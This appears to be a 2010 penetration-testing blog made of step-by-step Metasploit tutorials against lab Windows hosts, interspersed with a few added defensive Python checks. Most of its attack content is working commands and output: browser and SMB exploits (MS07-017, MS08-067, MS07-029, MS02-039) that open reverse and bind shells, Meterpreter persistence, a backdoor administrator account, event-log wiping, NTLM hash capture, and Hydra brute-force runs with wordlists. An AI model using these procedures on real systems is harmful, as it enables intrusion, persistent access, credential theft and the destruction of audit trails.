set URIPATH /you_win.html
exploit

Press Ctrl-X to exit and save the file.

Step 2: Launch the exploit based on the resource file you have created earlier

root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /tmp/exploit
[*] Exploit running as background job.

[*] Started reverse handler on 131.107.1.252:443
[*] Using URL: http://131.107.1.252:80/you_win.html
[*] Server started.

Step 3: Launch Internet Explorer on the remote machine and connect to http://131.107.1.252/you_win.html

Step 4: On our machine, check if you've got the connection from the target machine

msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 131.107.1.50:1163...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 131.107.1.50:1163...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:443 -> 131.107.1.50:1164) at Wed Sep 15 17:08:18 +0800 2010

Display all active sessions

msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\Administrator @ LON-CL1 131.107.1.252:443 -> 131.107.1.50:1164

Interact with an active session

msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Tutorial: Interacting with Meterpreter

Enabling Remote Desktop

meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
sniff..

Open a command shell

meterpreter > shell
Process 1616 created.
Channel 23 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>


Create a local user account and add it as a member of local administrators group

C:\Documents and Settings\Administrator>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.

C:\Documents and Settings\Administrator>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.

C:\Documents and Settings\Administrator>^C
Terminate channel 2? [y/N] y

Open another command shell then launch Remote Desktop client to connect to the target machine.

root@bt:~# rdesktop 131.107.1.50
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Upload file

meterpreter > upload /tmp/hacked.txt "C:\\Documents and Settings\\Administrator\\Desktop\\hacked.txt"
[*] uploading : /tmp/hacked.txt -> C:\Documents and Settings\Administrator\Desktop\hacked.txt
[*] uploaded : /tmp/hacked.txt -> C:\Documents and Settings\Administrator\Desktop\hacked.txt

Download file

meterpreter > download C:\\WINDOWS\\System32\\calc.exe /tmp
[*] downloading: C:\WINDOWS\System32\calc.exe -> /tmp
[*] downloaded : C:\WINDOWS\System32\calc.exe -> /tmp/calc.exe

Tutorial: Maintaining Access & Clearing Tracks

Local Host: 131.107.1.252/24 (TEST-BT4)
Target Host: 131.107.1.50/24 (LON-CL1)

Step 1: Detect the OS version on the target machine

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 131.107.1.50
msf auxiliary(smb_version) > run

[*] 131.107.1.50 is running Windows XP Service Pack 2 (language: English) (name:LON-CL1) (domain:FABRIKAM)

Step 2: Exploit the target machine based on known vulnerability (MS08-067)

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 131.107.1.50
msf exploit(ms08_067_netapi) > set LHOST 131.107.1.252
msf exploit(ms08_067_netapi) > set TARGET 3
msf exploit(ms08_067_netapi) > set LPORT 8888
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 131.107.1.252:8888
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:8888 -> 131.107.1.50:1125)

Step 3: Plant or inject the Meterpreter agent on the target machine

meterpreter > run persistence -h

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -A -X -p 10000 -r 131.107.1.252
[*] Creating a persistent agent: LHOST=131.107.1.252 LPORT=10000 (interval=5 onboot=true)
sniff..

msf exploit(ms08_067_netapi) > exit -y

Step 4: Create a Meterpreter listener on our machine

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 131.107.1.252
msf exploit(handler) > set LPORT 10000
msf exploit(handler) > exploit

[*] Started reverse handler on 131.107.1.252:10000
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:10000 -> 131.107.1.50:1124)

Note: the Meterpreter agent is installed in the C:\WINDOWS\TEMP directory as a .vbs file, and an autostart entry is created under the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(random) on the target machine.
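Those two artifacts, a .vbs in a Temp directory and a randomly named value under the Run key, are what an administrator auditing the machine should look for. The audit below is an added example, not code from the original post or from Metasploit: given a dictionary of Run-key value names and command lines (for instance exported with `reg query` and parsed separately), it flags entries that launch scripts out of a Temp directory or whose value name looks machine-generated. The entries, the heuristics' thresholds and the exact command line used for the agent are constructed for the example.

```python
"""Audit Run-key autostart entries for script-based persistence.

Added example, not part of the original post. The persistence script above
drops a .vbs agent in a Temp directory and adds a randomly named value under
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. This audit takes a
dict of Run-key values (for instance exported with 'reg query' and parsed
separately) and flags entries that launch scripts from Temp or carry a
random-looking name. The entries, thresholds and the exact command line of
the agent are constructed for the example, not taken from Metasploit.
"""
import re
from typing import Dict, List

# Command line points into a Temp directory (any case, including 8.3 paths).
_TEMP_PATH = re.compile(r"\\temp\\|\\tmp\\", re.I)
# Windows Script Host or a script file extension in the command line.
_SCRIPT = re.compile(r"\b[wc]script(\.exe)?\b|\.(vbs|vbe|js|jse|wsf|bat|cmd)\b", re.I)


def looks_random(name: str) -> bool:
    """Heuristic for generated value names: few vowels or heavy case churn.
    Thresholds are assumptions chosen for this example."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 8:
        return False
    vowels = sum(c.lower() in "aeiou" for c in letters)
    churn = sum(a.islower() != b.islower() for a, b in zip(letters, letters[1:]))
    return vowels / len(letters) < 0.25 or churn / (len(letters) - 1) > 0.5


def audit_run_keys(entries: Dict[str, str]) -> Dict[str, List[str]]:
    """Return value-name -> reasons for every entry that trips a check."""
    findings = {}
    for name, command in entries.items():
        reasons = []
        if _TEMP_PATH.search(command):
            reasons.append("temp-path")
        if _SCRIPT.search(command):
            reasons.append("script-host")
        if looks_random(name):
            reasons.append("random-name")
        if reasons:
            findings[name] = reasons
    return findings


# Constructed Run-key contents: two ordinary entries, one shaped like the
# persistence agent in the post, and one plain script in C:\WINDOWS\TEMP.
RUN_ENTRIES = {
    "VMware Tools": r'"C:\Program Files\VMware\VMware Tools\VMwareTray.exe"',
    "SunJavaUpdateSched": r'"C:\Program Files\Java\jre6\bin\jusched.exe"',
    "NaPNlcSlsZRpqA": r'wscript.exe //B "C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs"',
    "Updater": r"C:\WINDOWS\TEMP\svc.vbs",
}

if __name__ == "__main__":
    for name, reasons in audit_run_keys(RUN_ENTRIES).items():
        print(f"{name}: {', '.join(reasons)}")
```

On the constructed entries the agent-shaped value trips all three checks and the plain Temp script trips two, while the two vendor entries pass. Pair this with the cleanup .rc file the persistence script prints, which names the exact value it created, when confirming a finding.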

Now you can proceed with the last step, Clearing Tracks (Housekeeping), as follows:

meterpreter > clearev
[*] Wiping 997 records from Application...
[*] Wiping 2045 records from System...
[*] Wiping 1 records from Security...

Tuesday, September 14, 2010

Tutorial: Local Enumeration via SMB Service

Local Host: 131.107.1.222/24 (TEST-XP2)
Target Host: 131.107.1.101/24 (DEN-WEB1)

Enumerate Local Domains
Z:\Tools\Nmap>nmap --script=smb-enum-domains 131.107.1.101

Enumerate Shared Folders
Z:\Tools\Nmap>nmap --script=smb-enum-shares 131.107.1.101

Enumerate User Accounts
Z:\Tools\Nmap>nmap --script=smb-enum-users 131.107.1.101

Enumerate User Groups
Z:\Tools\Nmap>nmap --script=smb-enum-groups 131.107.1.101

Enumerate Processes
Z:\Tools\Nmap>nmap --script=smb-enum-processes 131.107.1.101

Enumerate Sessions
Z:\Tools\Nmap>nmap --script=smb-enum-sessions 131.107.1.101

Note:
On Windows, the Nmap scripts directory is Z:\Tools\Nmap\scripts
On Linux (BackTrack), the Nmap scripts directory is /usr/share/nmap/scripts/
All Nmap scripts have the file extension of .nse (Nmap Scripting Engine) and are written in Lua.

Tutorial: Password Cracking Attacks

Local Host: 131.107.1.222/24 (TEST-XP2)
Target Host: 131.107.1.101/24 (DEN-WEB1)

Brute Force Password Attack via SMB service

Z:\Tools\Nmap>nmap --script=smb-brute 131.107.1.101

Dictionary Password Attack via FTP, SMB and MSSQL service

Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 ftp
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 smb
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 mssql

login.txt = contains user names
pass.txt = contains passwords

Contents of login.txt file:
admin
administrator
myadmin
sa
sysadmin
root

Contents of pass.txt file:
[blank]
admin
administrator
password
password123
P@ssw0rd
P@ssw0rd123
Pa$$w0rd
Pa$$w0rd123
sa
sysadmin
root
r00t
toor
t00r
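Read from the defending side, pass.txt is mostly one word in several spellings: password, P@ssw0rd, Pa$$w0rd123; root, r00t, toor. A password policy that only checks the literal string will accept the variants. The check below is an added example, not code from the original post or from Hydra: it lower-cases a candidate, strips a trailing digit run, undoes the common character substitutions and only then compares against the base words (and their reversals, which covers toor). The substitution table, the 12-character minimum and the list of base words are assumptions made for the example.

```python
"""Reject passwords that normalize to the lab wordlist.

Added example, not part of the original post. The pass.txt list above is
mostly one word in several spellings (password / P@ssw0rd / Pa$$w0rd123,
root / r00t / toor). This check undoes the common substitutions and strips
the numeric suffix before comparing, so such variants are rejected as the
same weak word. The minimum length and the substitution table are
assumptions for this example.
"""
from typing import Dict, Iterable, Optional

# Character substitutions undone before comparison.
_LEET = str.maketrans({"@": "a", "0": "o", "$": "s", "3": "e", "1": "i", "!": "i"})
BASE_WORDS = {"admin", "administrator", "password", "sa", "sysadmin", "root"}
MIN_LENGTH = 12  # assumed policy minimum


def normalize(password: str) -> str:
    """Lower-case, drop a trailing digit run, then undo leet substitutions.
    Digits are stripped first so that the 123 suffix is not turned into
    letters by the substitution table."""
    stripped = password.lower().rstrip("0123456789")
    return stripped.translate(_LEET)


def is_weak(password: str, usernames: Iterable[str] = ()) -> Optional[str]:
    """Return a reason string if the password is weak, else None."""
    if not password:
        return "empty"
    base = normalize(password)
    if base in BASE_WORDS:
        return f"wordlist:{base}"
    if base[::-1] in BASE_WORDS:
        return f"reversed-wordlist:{base[::-1]}"
    if base in {u.lower() for u in usernames}:
        return "equals-username"
    if len(password) < MIN_LENGTH:
        return "too-short"
    return None


# login.txt and pass.txt from the post; "[blank]" stands for the empty string.
LOGIN_TXT = ["admin", "administrator", "myadmin", "sa", "sysadmin", "root"]
PASS_TXT = ["", "admin", "administrator", "password", "password123", "P@ssw0rd",
            "P@ssw0rd123", "Pa$$w0rd", "Pa$$w0rd123", "sa", "sysadmin", "root",
            "r00t", "toor", "t00r"]


def weak_entries(passwords: Iterable[str]) -> Dict[str, str]:
    """Map each rejected password to the reason it was rejected."""
    rejected = {}
    for p in passwords:
        reason = is_weak(p, LOGIN_TXT)
        if reason:
            rejected[p] = reason
    return rejected


if __name__ == "__main__":
    for pw, reason in weak_entries(PASS_TXT).items():
        print(f"{pw!r}: {reason}")
```

Every entry of pass.txt is rejected, and all nine password/root spellings collapse onto two reasons; a policy built this way, with a longer base-word list, removes exactly the guesses a dictionary run like the one above starts with.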

Tutorial: NTLM Authentication Hijack

Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)

Step 1: Search for smb pattern

msf > search smb

Step 2: Use SMB Auxiliary module to capture hashes

msf > use server/capture/smb
msf auxiliary(smb) > show options
sniff..
msf auxiliary(smb) > set PWFILE /tmp/captured_hashes.txt

msf auxiliary(smb) > set SRVHOST 192.168.1.252
msf auxiliary(smb) > run

Step 3: From the target machine, connect to our machine by using:

\\192.168.1.252\shared\xxx.jpg

Note: \shared\xxx.jpg is just a fake link (doesn't exist).

Step 4: Switch to our machine and check if you've got the hashes captured

msf auxiliary(smb) >
[*] Captured 192.168.1.50:1038 LON-CL1\Administrator LMHASH:24c9f38ec487472158851be047f9bd66ee5ef6eb6ff6e04d NTHASH:e52d81bf661f3699cfa4b631aead9ec78416dc8bce17dfd4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1

Press Ctrl-C to exit from the msf console.

To display the captured hashes, change to the /tmp directory:

root@bt:/pentest/exploits/framework3# cd /tmp
root@bt:/tmp# cat captured_hashes.txt

Sample Vulnerability Report

You can download a sample vulnerability report in PDF format here.

Tutorial: Metasploit Basics 3

Exploiting Vulnerable Server (MS08-067)

Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.250/24 (DEN-WEB3)

Step 1: Switch to Metasploit Framework working directory

root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole

Step 2: Determine the target's OS version

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 131.107.1.250
msf auxiliary(smb_version) > run

[*] 131.107.1.250 is running Windows 2003 Service Pack 2
sniff...

Step 3: Search for smb pattern & use the correct exploit module (ms08-067)

msf > search smb

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 131.107.1.250
msf exploit(ms08_067_netapi) > set LHOST 131.107.1.252
msf exploit(ms08_067_netapi) > set LPORT 443
msf exploit(ms08_067_netapi) > show targets

Exploit targets:

Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP1 Japanese (NO NX)
9 Windows 2003 SP2 English (NO NX)
10 Windows 2003 SP2 English (NX)
11 Windows 2003 SP2 German (NO NX)
12 Windows 2003 SP2 German (NX)
13 Windows XP SP2 Arabic (NX)
sniff...

msf exploit(ms08_067_netapi) > set TARGET 10
msf exploit(ms08_067_netapi) > exploit

sniff...

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Tutorial: Metasploit Basics 2

Exploiting Vulnerable Server (MS07-029)

Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.250/24 (DEN-WEB3)

Step 1: Switch to Metasploit Framework working directory

root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole

Step 2: Search for rpc pattern & use the correct exploit module (ms07-029)

msf > search rpc
[*] Searching loaded modules for pattern 'rpc'...

msf > info windows/dcerpc/ms07_029_msdns_zonename

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
msf exploit(ms07_029_msdns_zonename) > exploit

sniff...

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Tutorial: BackTrack Basics

Setting up IP addresses

Option 1: Static IP addresses

Note: Ensure that all your VM network interface cards are set to Host-only.

root@bt:~# ifconfig eth0 up

root@bt:~# ifconfig eth0 131.107.1.252/24
root@bt:~# ifconfig eth1 up
root@bt:~# ifconfig eth1 192.168.1.252/24
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:5d:6a:2f
inet addr:131.107.1.252 Bcast:131.107.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe5d:6a2f/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:64717 errors:0 dropped:0 overruns:0 frame:0
TX packets:301639 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9873166 (9.8 MB) TX bytes:15566403 (15.5 MB)
Interrupt:19 Base address:0x2000

eth1 Link encap:Ethernet HWaddr 00:0c:29:5d:6a:39
inet addr:192.168.1.252 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe5d:6a39/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:248732 errors:0 dropped:0 overruns:0 frame:0
TX packets:6227 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15234469 (15.2 MB) TX bytes:332024 (332.0 KB)
Interrupt:16 Base address:0x2080

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:29254 errors:0 dropped:0 overruns:0 frame:0
TX packets:29254 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:7105201 (7.1 MB) TX bytes:7105201 (7.1 MB)

Option 2: Static & Dynamic IP addresses

Note: Ensure that your 2nd network interface card (VM) is set to NAT or Bridged.

root@bt:~# ifconfig eth0 up
root@bt:~# ifconfig eth0 131.107.1.252/24
root@bt:~# ifconfig eth1 up

NAT configuration

root@bt:~# dhclient eth1
snip...
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/

Listening on LPF/eth1/00:0c:29:5d:6a:39
Sending on LPF/eth1/00:0c:29:5d:6a:39
Sending on Socket/fallback
DHCPREQUEST of 192.168.252.63 on eth1 to 255.255.255.255 port 67
DHCPNAK from 192.168.162.254
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 192.168.162.128 from 192.168.162.254
DHCPREQUEST of 192.168.162.128 on eth1 to 255.255.255.255 port 67
DHCPACK of 192.168.162.128 from 192.168.162.254
bound to 192.168.162.128 -- renewal in 712 seconds.

Bridge configuration with Gateway and Name Servers

root@bt:~# dhclient eth1
snip...
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/

Listening on LPF/eth1/00:0c:29:5d:6a:39
Sending on LPF/eth1/00:0c:29:5d:6a:39
Sending on Socket/fallback
DHCPREQUEST of 192.168.162.128 on eth1 to 255.255.255.255 port 67
DHCPNAK from 192.168.252.37
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 192.168.252.154 from 192.168.252.37
DHCPREQUEST of 192.168.252.154 on eth1 to 255.255.255.255 port 67
DHCPACK of 192.168.252.154 from 192.168.252.37
bound to 192.168.252.154 -- renewal in 320827 seconds.
root@bt:~# route add default gw 192.168.252.1
root@bt:~# route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default etserver.execut 255.255.255.0 UG 0 0 0 eth1
192.168.101.0 * 255.255.255.0 U 0 0 0 eth0
192.168.252.0 * 255.255.255.0 U 0 0 0 eth1

root@bt:~# nano /etc/resolv.conf

nameserver 192.168.252.1
nameserver 208.67.222.222
nameserver 208.67.220.220

root@bt:~# ping 192.168.252.1
PING 192.168.252.1 (192.168.252.1) 56(84) bytes of data.
64 bytes from 192.168.252.1: icmp_seq=1 ttl=128 time=0.741 ms
64 bytes from 192.168.252.1: icmp_seq=2 ttl=128 time=0.729 ms
64 bytes from 192.168.252.1: icmp_seq=3 ttl=128 time=0.689 ms
^C
--- 192.168.252.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 0.689/0.719/0.741/0.038 ms

root@bt:~# ping www.yahoo.com
PING any-fp.wa1.b.yahoo.com (72.30.2.43) 56(84) bytes of data.
64 bytes from ir1.fp.vip.sk1.yahoo.com (72.30.2.43): icmp_seq=1 ttl=44 time=308 ms
snip...
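A quick sanity check for the layout above (added here as an example, not part of the original post): parse `ifconfig` and `route` output and confirm that eth0 still carries the static lab address, eth1 got its lease, and the default route leaves through eth1 rather than the host-only lab interface. The sample output is constructed to match the post.

```python
"""Check a BackTrack lab VM's addressing from `ifconfig` and `route` output.
Added example, not from the original post; the sample output below is constructed."""
import re

LAB_IFACE, LAB_ADDR = "eth0", "131.107.1.252"   # host-only segment, as in the post
NAT_IFACE = "eth1"                               # NAT or bridged, carries internet traffic
IFCONFIG_OUT = """\
eth0 Link encap:Ethernet HWaddr 00:0c:29:5d:6a:2f
inet addr:131.107.1.252 Bcast:131.107.1.255 Mask:255.255.255.0
eth1 Link encap:Ethernet HWaddr 00:0c:29:5d:6a:39
inet addr:192.168.252.154 Bcast:192.168.252.255 Mask:255.255.255.0
"""
ROUTE_OUT = """\
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.252.1 0.0.0.0 UG 0 0 0 eth1
131.107.1.0 * 255.255.255.0 U 0 0 0 eth0
192.168.252.0 * 255.255.255.0 U 0 0 0 eth1
"""

def parse_ifconfig(text):
    """Map interface name -> IPv4 address (None if the interface has no inet addr)."""
    addrs, iface = {}, None
    for line in text.splitlines():
        head = re.match(r"^(\S+)\s+Link encap", line)
        inet = re.search(r"inet addr:(\d+\.\d+\.\d+\.\d+)", line)
        if head:
            iface = head.group(1)
            addrs.setdefault(iface, None)
        elif inet and iface:
            addrs[iface] = inet.group(1)
    return addrs

def default_route_iface(text):
    """Interface named on the default (0.0.0.0) gateway line of `route` output, or None."""
    for line in text.splitlines():
        cols = line.split()
        if len(cols) >= 8 and cols[0] in ("default", "0.0.0.0") and "G" in cols[3]:
            return cols[7]
    return None

def check_lab_network(ifconfig_text, route_text):
    """Return a list of problems; an empty list means the VM matches the intended layout."""
    addrs, problems = parse_ifconfig(ifconfig_text), []
    if addrs.get(LAB_IFACE) != LAB_ADDR:
        problems.append(f"{LAB_IFACE} has {addrs.get(LAB_IFACE)}, expected {LAB_ADDR}")
    if not addrs.get(NAT_IFACE):
        problems.append(f"{NAT_IFACE} has no address; run dhclient {NAT_IFACE}")
    gw_if = default_route_iface(route_text)
    if gw_if != NAT_IFACE:
        problems.append(f"default route via {gw_if}, expected {NAT_IFACE}")
    return problems
```

On a live box, feed it the real output (`ifconfig` and `route -n`) instead of the constructed strings.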

Monday, September 13, 2010

Tutorial: Metasploit Basics 1

Exploiting Vulnerable Server (MS02-039)

Local host: 131.107.1.252/24 (TEST-BT4)
Target host: 131.107.1.101/24 (DEN-WEB1)

Step 1: Switch to Metasploit Framework working directory

root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole

Step 2: Search for mssql pattern & use the correct exploit module (ms02-039)

msf > search mssql
[*] Searching loaded modules for pattern 'mssql'...

msf > info windows/mssql/ms02_039_slammer

msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > show payloads

msf exploit(ms02_039_slammer) > set PAYLOAD windows/shell/bind_tcp

msf exploit(ms02_039_slammer) > show options

msf exploit(ms02_039_slammer) > set RHOST 131.107.1.101

msf exploit(ms02_039_slammer) > set LHOST 131.107.1.252
msf exploit(ms02_039_slammer) > set LPORT 5555
msf exploit(ms02_039_slammer) > exploit

snip...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
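Both walkthroughs (the MS07-029 reverse shell on port 443 above and this MS02-039 bind shell on port 5555) end with cmd.exe sending its banner in the clear, which is exactly what a network sensor can key on. Added example, not from the original posts: a small classifier that flags non-TLS data on 443 and the cmd.exe banner in either direction; the stream records are constructed to mirror the two sessions.

```python
"""Spot the cleartext Windows command shells produced by the two Metasploit sessions
above. Added example, not from the original posts; the stream records are constructed."""
import re
from dataclasses import dataclass
from typing import Optional

# cmd.exe banner as it appears in the posts (Windows 2003 and Windows 2000 forms).
CMD_BANNER = re.compile(rb"Microsoft Windows(?: 2000)? \[Version [0-9.]+\]\r?\n\(C\) Copyright")
# A bare "C:\...>" prompt closing a segment is the other tell-tale.
CMD_PROMPT = re.compile(rb"(?:^|\r?\n)[A-Z]:\\[^\r\n]*>\s*$")

@dataclass
class Stream:
    client: str        # host that opened the TCP connection
    server: str
    dport: int
    to_server: bytes   # bytes observed client -> server
    to_client: bytes   # bytes observed server -> client

def is_tls_handshake(data: bytes) -> bool:
    """TLS opens with a handshake record: type 0x16, version 0x03 0x00..0x03."""
    return len(data) >= 3 and data[0] == 0x16 and data[1] == 0x03 and data[2] <= 0x03

def has_cmd_shell(data: bytes) -> bool:
    return bool(CMD_BANNER.search(data) or CMD_PROMPT.search(data))

def classify(s: Stream) -> Optional[str]:
    """Reason string when the stream looks like an interactive cmd.exe, else None."""
    if s.dport == 443 and s.to_server and not is_tls_handshake(s.to_server):
        if has_cmd_shell(s.to_server):
            return f"reverse shell: cmd.exe banner sent by {s.client} in the clear on 443"
        return f"non-TLS data on 443 from {s.client}"
    if has_cmd_shell(s.to_client):
        return f"bind shell: cmd.exe banner served by {s.server}:{s.dport}"
    return None

# Constructed streams mirroring the two sessions above.
REVERSE = Stream("131.107.1.250", "131.107.1.252", 443,
    b"Microsoft Windows [Version 5.2.3790]\r\n(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32>",
    b"")
BIND = Stream("131.107.1.252", "131.107.1.101", 5555, b"",
    b"Microsoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright 1985-1999 Microsoft Corp.\r\n\r\nC:\\WINNT\\system32>")
TLS = Stream("131.107.1.250", "131.107.1.252", 443, b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0", b"")
```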

Tuesday, August 10, 2010

Windows Shortcut Vulnerability

The Windows Shortcut Exploit, also known as CPLINK, is a zero-day vulnerability in all versions of Windows that allows a Windows shortcut link, known as an .lnk file, to run a malicious DLL file. The dangerous shortcut links can also be embedded on a website or hidden within documents.

The exploit works when you open a device, network share or WebDAV share carrying an infection; you don't need to click on anything for the exploit to work, even if you have AutoPlay and AutoRun disabled.

SophosLabs first saw this exploit at work through the rootkit W32/Stuxnet-B, which targets Siemens SCADA systems to discover the system default password.

While Stuxnet only affected Windows machines with infected USB drives plugged in, the Windows Shortcut Exploit in general can work through file shares and WebDAV as well.

Download the protection tool here.

Tuesday, July 27, 2010

Metasploit Framework GUI

Just released... Metasploit Framework GUI based on Java.

To launch, follow these steps:

Step 1: Launch msfrpcd
cd /pentest/exploits/framework3
./msfrpcd -S -U root -P toor -p 1337

-S = Disable SSL
-U = Username
-P = Password
-p = Listening port

Step 2: Launch msfgui
cd /pentest/exploits/framework3
./msfgui

When the Metasploit Java-based GUI appears, enter the correct Username, Password and Port.